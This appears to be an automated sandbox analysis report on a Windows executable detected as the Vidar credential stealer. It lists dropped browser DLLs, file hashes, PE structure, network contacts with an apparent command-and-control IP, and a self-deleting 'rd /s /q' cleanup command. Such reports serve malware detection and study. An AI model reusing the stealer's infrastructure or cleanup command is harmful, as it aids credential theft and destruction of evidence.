                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):608080
                    Entropy (8bit):6.833616094889818
                    Encrypted:false
                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):450024
                    Entropy (8bit):6.673992339875127
                    Encrypted:false
                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                    Download File
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:PE32 executable (console) Intel 80386, for MS Windows
                    Entropy (8bit):7.529756734354945
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:382'976 bytes
                    MD5:b580ff2d001291bf58bdd23a058ef21b
                    SHA1:5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
                    SHA256:80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
                    SHA512:85643ff028ffa0d7c6e7b3dd69c9316aed5e6c15c364bfdb14ec65ca9859ee8fb2ae04e3990c2275671da27abb727a9505f2acf5453a4bb1a3f4df0664df603b
                    SSDEEP:6144:3hp+scz0+j/2LXudxnOqC3dFxYkBY8EdltIPaiTeUkHjUP6PiLNwETfeuBMbxFr9:3SscQu/CLtF3BY87PFi7HJAwETfhMlF5
                    TLSH:6684E051B4C1C032D433153A49F4DBB85E7EB9600AA69A9FBB940F7F4F312C1D621A6B
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3UT.w4:.w4:.w4:..F9.{4:..F?..4:..F>.b4:...>.e4:...9.b4:..F;.~4:.w4;..4:...?.!4:...3.v4:...8.v4:.Richw4:.................PE..L..

                    File Icon

                    Icon Hash:90cececece8e8eb0

                    Static PE Info

                    General

                    Entrypoint:0x4072d9
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows cui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x6644F62C [Wed May 15 17:51:40 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:81b834f6f9db0b945bd836f537996a1f

                    Entrypoint Preview

                    Instruction
                    call 00007F13E0BBF083h
                    jmp 00007F13E0BBE759h
                    push ebp
                    mov ebp, esp
                    mov eax, dword ptr [ebp+08h]
                    push esi
                    mov ecx, dword ptr [eax+3Ch]
                    add ecx, eax
                    movzx eax, word ptr [ecx+14h]
                    lea edx, dword ptr [ecx+18h]
                    add edx, eax
                    movzx eax, word ptr [ecx+06h]
                    imul esi, eax, 28h
                    add esi, edx
                    cmp edx, esi
                    je 00007F13E0BBE8FBh
                    mov ecx, dword ptr [ebp+0Ch]
                    cmp ecx, dword ptr [edx+0Ch]
                    jc 00007F13E0BBE8ECh
                    mov eax, dword ptr [edx+08h]
                    add eax, dword ptr [edx+0Ch]
                    cmp ecx, eax
                    jc 00007F13E0BBE8EEh
                    add edx, 28h
                    cmp edx, esi
                    jne 00007F13E0BBE8CCh
                    xor eax, eax
                    pop esi
                    pop ebp
                    ret
                    mov eax, edx
                    jmp 00007F13E0BBE8DBh
                    push esi
                    call 00007F13E0BBF35Dh
                    test eax, eax
                    je 00007F13E0BBE902h
                    mov eax, dword ptr fs:[00000018h]
                    mov esi, 0045DB4Ch
                    mov edx, dword ptr [eax+04h]
                    jmp 00007F13E0BBE8E6h
                    cmp edx, eax
                    je 00007F13E0BBE8F2h
                    xor eax, eax
                    mov ecx, edx
                    lock cmpxchg dword ptr [esi], ecx
                    test eax, eax
                    jne 00007F13E0BBE8D2h
                    xor al, al
                    pop esi
                    ret
                    mov al, 01h
                    pop esi
                    ret
                    push ebp
                    mov ebp, esp
                    cmp dword ptr [ebp+08h], 00000000h
                    jne 00007F13E0BBE8E9h
                    mov byte ptr [0045DB50h], 00000001h
                    call 00007F13E0BBEBA7h
                    call 00007F13E0BC18F0h
                    test al, al
                    jne 00007F13E0BBE8E6h
                    xor al, al
                    pop ebp
                    ret
                    call 00007F13E0BC92C9h
                    test al, al
                    jne 00007F13E0BBE8ECh
                    push 00000000h
                    call 00007F13E0BC18F7h
                    pop ecx
                    jmp 00007F13E0BBE8CBh
                    mov al, 01h
                    pop ebp
                    ret
                    push ebp
                    mov ebp, esp
                    cmp byte ptr [0045DB51h], 00000000h
                    je 00007F13E0BBE8E6h
                    mov al, 01h

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x291c80x64.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f0000x1d14.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x272800x1c.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x271c00x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x200000x174.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x1e2ab0x1e4006aaddd29a7b1d14c04fafe4373874165False0.5765996255165289data6.591179392915493IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x200000x9a580x9c00c0d3af8d875e80d0742331423512f2ceFalse0.3869941907051282data4.658571126756863IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x2a0000x346540x336002cb86b6c8671c22ce21f5d03dfb1e373False0.9822270377128953data7.9818411522888875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc0x5f0000x1d140x1e0045d81991a944a5e251cf5f207dbbc2a5False0.7373697916666667data6.468270351939864IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Imports

                    DLLImport
                    GDI32.dllGetClipBox
                    USER32.dllPostQuitMessage
                    ADVAPI32.dllCryptDecrypt
                    KERNEL32.dllHeapSize, CreateFileW, VirtualAlloc, WaitForSingleObject, GetModuleHandleA, FreeConsole, CreateThread, GetProcAddress, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, GetCurrentThreadId, CloseHandle, WaitForSingleObjectEx, GetExitCodeThread, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, ReleaseSRWLockExclusive, WakeAllConditionVariable, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetProcessHeap, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 15, 2024 20:35:50.127605915 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:50.127636909 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:50.127707005 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:50.134161949 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:50.134172916 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:50.364038944 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:50.364135981 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:50.455997944 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:50.456013918 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:50.456284046 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:50.456331968 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:50.461704016 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:50.508116961 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.061505079 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.061527967 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.061563015 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.061635971 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:51.061645985 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.061687946 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:51.168766975 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.168817997 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.168853998 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:51.168865919 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.168914080 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:51.192764997 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.192811966 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.192836046 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.192854881 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:51.192898989 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:51.208177090 CEST49730443192.168.2.423.194.234.100
                    May 15, 2024 20:35:51.208195925 CEST4434973023.194.234.100192.168.2.4
                    May 15, 2024 20:35:51.225543976 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:51.225575924 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:51.225739956 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:51.226167917 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:51.226177931 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:51.967655897 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:51.967739105 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:51.972084999 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:51.972090960 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:51.972296953 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:51.972352028 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:51.972640991 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:52.020127058 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:52.523298979 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:52.523364067 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:52.523390055 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:52.523421049 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:52.528031111 CEST49731443192.168.2.495.217.240.101
                    May 15, 2024 20:35:52.528048038 CEST4434973195.217.240.101192.168.2.4
                    May 15, 2024 20:35:52.530442953 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:52.530478954 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:52.530564070 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:52.530831099 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:52.530847073 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.003607035 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.003669977 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.004223108 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.004229069 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.006026030 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.006031990 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.896611929 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.896672964 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.896709919 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.896873951 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.896941900 CEST49732443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.896955013 CEST4434973295.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.898546934 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.898566961 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:53.898648977 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.898866892 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:53.898880005 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:54.364252090 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:54.364336014 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:54.365077019 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:54.365082979 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:54.366694927 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:54.366699934 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.240196943 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.240227938 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.240287066 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.240338087 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.240365982 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.240637064 CEST49733443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.240654945 CEST4434973395.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.242537022 CEST49734443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.242563009 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.242651939 CEST49734443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.242862940 CEST49734443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.242872000 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.708503008 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.708595037 CEST49734443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.709259033 CEST49734443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.709264040 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:55.711061001 CEST49734443192.168.2.495.217.240.101
                    May 15, 2024 20:35:55.711065054 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:56.579741955 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:56.579775095 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:56.579838991 CEST4434973495.217.240.101192.168.2.4
                    May 15, 2024 20:35:56.579965115 CEST49734443192.168.2.495.217.240.101

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 15, 2024 20:35:50.009427071 CEST5822353192.168.2.41.1.1.1
                    May 15, 2024 20:35:50.120599031 CEST53582231.1.1.1192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    May 15, 2024 20:35:50.009427071 CEST192.168.2.41.1.1.10xbd2Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    May 15, 2024 20:35:50.120599031 CEST1.1.1.1192.168.2.40xbd2No error (0)steamcommunity.com23.194.234.100A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • steamcommunity.com
                    • 95.217.240.101

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x6e0000
                    File size:382'976 bytes
                    MD5 hash:B580FF2D001291BF58BDD23A058EF21B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:1
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Imagebase:0x4e0000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Imagebase:0x910000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:20:36:34
                    Start date:15/05/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                    Imagebase:0x7ff72bec0000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:8
                    Start time:20:36:34
                    Start date:15/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:9
                    Start time:20:36:34
                    Start date:15/05/2024
                    Path:C:\Windows\SysWOW64\timeout.exe
                    Wow64 process (32bit):true
                    Commandline:timeout /t 10
                    Imagebase:0xd00000
                    File size:25'088 bytes
                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Disassembly

                    No disassembly